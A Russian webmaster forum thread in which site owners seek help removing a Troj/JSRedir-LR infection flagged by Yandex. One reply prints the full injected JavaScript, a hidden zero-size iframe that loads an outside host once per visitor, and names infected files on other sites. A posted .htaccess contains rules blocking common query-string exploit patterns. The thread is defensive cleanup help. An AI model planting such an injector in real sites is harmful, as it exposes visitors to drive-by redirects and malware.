Черная метка Яндекса

123 4
deepslam
На сайте с 09.05.2006
Offline
204
#11
SeVlad:
deepslam, ты сразу пиши - платным "специализированным ПО". Почему этот факт вечно тихаришь, спамя по топикам?

Только нафик оно надо при бесплатном айболите (и не только аи)


Чушь, конечно. Я это хотел ещё в твоей ветке написать, но не стал биз портить. (Может зря?)
Нет и не может быть 100% автоматического "лечения" сайтов, если нет мозгов разбираться с кодами. Зато вероятность повреждения сайта при "автолечении" стремится к 99%.

Я не скрывал, что он платный.

А техническая поддержка предназначена как разбна случай, если мозгов не хватит, как Вы сказали.

Впрочем тут это оффтоп

---------- Добавлено 21.08.2013 в 23:23 ----------

TF-Studio:
deepslam, уже начинает утомлять спам в каждой теме.

Ок, больше не буду :)

Удаление вирусов на сайте (http://www.virusonsite.ru) | Scripto CMS - бесплатная система управления сайтом (http://www.scripto-cms.ru) |Профессиональный скрипт каталога ссылок , статей, фирм и объявлений! (http://www.scripto.ru) | Уникальный скрипт для публикации контента (http://publisher.scripto.ru)
SeVlad
На сайте с 03.11.2008
Offline
1609
#12
deepslam:
Я не скрывал, что он платный.

"Не скрывал" это когда об этом сразу пишется, а не когда перейдёшь на сайт и только там уже узнаёшь, что зря потерял часть своей жизни.

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
K
На сайте с 26.01.2013
Offline
5
#13

Доброй ночи, уважаемые форумчане. На мой сайт уже два раза яндекс вешает черную метку, первый раз я восстановил сайт задним числом, после проверки ничего не нашел, второй раз сегодня прислал письмо что заражен Вредоносный код:

содержит Troj/JSRedir-LR (по данным компании Sophos).

сайт на joomla http://www.yurevets37.ru/

Подскажите что делать?

K5
На сайте с 21.07.2010
Offline
209
#14

konservator,

/components/com_datsogallery/libraries/jquery.min.js

ответ в конце файла (начиная с "var ifC5Jij")...

P.S. далее обновление (если не обновлен движок и модули), смена всех паролей (фтп, база, админка, панель хостинга), кнопка перепроверки в яндексе...

---------- Добавлено 21.08.2013 в 23:59 ----------

а так же проверить .htaccess, сайт отдает 302 ответ...

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
K
На сайте с 26.01.2013
Offline
5
#15

Спасибо kgtu5. Код удалил из файла, заменил стандартным файлом. Сменил все пароли. Написал вам в личку.

#Options +FollowSymLinks

RewriteEngine On
RewriteCond %{HTTP_HOST} yurevets37.ru$ [NC]
RewriteCond %{HTTP_HOST} !^www.yurevets37.ru$ [NC]
RewriteRule ^(.*)$ http://www.yurevets37.ru/$1 [R=301,L]

RewriteCond %{REQUEST_URI} ^/sitemap.xml
RewriteRule .* /index.php?option=com_xmap&view=xml&tmpl=component&id=2 [R=301,L]

## Mod_rewrite in use.

## Begin - Rewrite rules to block out some common exploits.
# If you experience problems on your site block out the operations listed below
# This attempts to block the most common type of exploit `attempts` to Joomla!
#
# Block out any script trying to base64_encode data within the URL.
RewriteCond %{QUERY_STRING} base64_encode[^(]*\([^)]*\) [OR]
# Block out any script that includes a <script> tag in URL.
RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL.
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL.
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Return 403 Forbidden header and show the content of the root homepage
RewriteRule .* index.php [F]
#
## End - Rewrite rules to block out some common exploits.

## Begin - Custom redirects
#
# If you need to redirect some pages, or set a canonical non-www to
# www redirect (or vice versa), place that code here. Ensure those
# redirects use the correct RewriteRule syntax and the [R=301,L] flags.
#
## End - Custom redirects

##
# Uncomment following line if your webserver's URL
# is not directly related to physical file paths.
# Update Your Joomla! Directory (just / for root).
##

# RewriteBase /

## Begin - Joomla! core SEF Section.
#
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
#
# If the requested path and file is not /index.php and the request
# has not already been internally rewritten to the index.php script
RewriteCond %{REQUEST_URI} !^/index\.php
# and the request is for something within the component folder,
# or for the site root, or for an extensionless URL, or the
# requested URL ends with one of the listed extensions
RewriteCond %{REQUEST_URI} /component/|(/[^.]*|\.(php|html?|feed|pdf|vcf|raw))$ [NC]
# and the requested path and file doesn't directly match a physical file
RewriteCond %{REQUEST_FILENAME} !-f
# and the requested path and file doesn't directly match a physical folder
RewriteCond %{REQUEST_FILENAME} !-d
# internally rewrite the request to the index.php script
RewriteRule .* index.php [L]
#
## End - Joomla! core SEF Section.
Y2
На сайте с 06.12.2011
Offline
12
#16

Ребята Всем доброй ночи, помогите пожалуйста найти и удалить эту заразу с сайта

Вредоносный код: содержит Troj/JSRedir-LR (по данным компании Sophos).

сайт на fast-sales http://texnostroy.com.ua/

как он выглядит и где его искать даже понятия не имею.

Пожалуйста помогите.

K5
На сайте с 21.07.2010
Offline
209
#17

yuriypopov2009, что яндекс-вебмастер пишет?

---------- Добавлено 22.08.2013 в 08:38 ----------

примерно такая вставка получается должна быть

var ifh8l8b = document.createElement('iframe');ifh8l8b.name = 'ifh8l8b';ifh8l8b.src = 'http://asdep.3inkjet. com/';ifh8l8b.style.width = '0px';ifh8l8b.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('ifh8l8b=') == -1) {document.cookie = 'ifh8l8b=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';document.getElementsByTagName('body')[0].appendChild(ifh8l8b);}};

примеры сайтов с такой же пометкой (пробел перед зоной):

tolerant. org.ua/2z/includes/js/functions.js

tancujutvse. ru/components/com_k2/js/k2.js

nsp-ukraine. com/modules/mod_f2caccordion/tmpl/js/jquery-1.2.6.pack.js

yuriypopov2009, у тебя аналогично

texnostroy. com.ua/includes/libs/jquery/jquery.js

V
На сайте с 23.08.2013
Offline
0
#18

Здравствуйте, столкнулся с данной проблемой на некоторых сайтах. Проверил сайт кучой антивирусов и не могу понять что за код ему не нравится. сайт megapolis-taxi.com

V
На сайте с 23.08.2013
Offline
0
#19

Спасибо за всё сам разобрался. Жду повторной проверки от яндекса

E
На сайте с 29.08.2013
Offline
0
#20

Помогите и мне, пожалуйста, найти и удалить эту заразу с сайта

Вредоносный код: содержит Troj/JSRedir-LR (по данным компании Sophos).

сайт на joomla http://magexpert. org

Пожалуйста!!!!

123 4

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий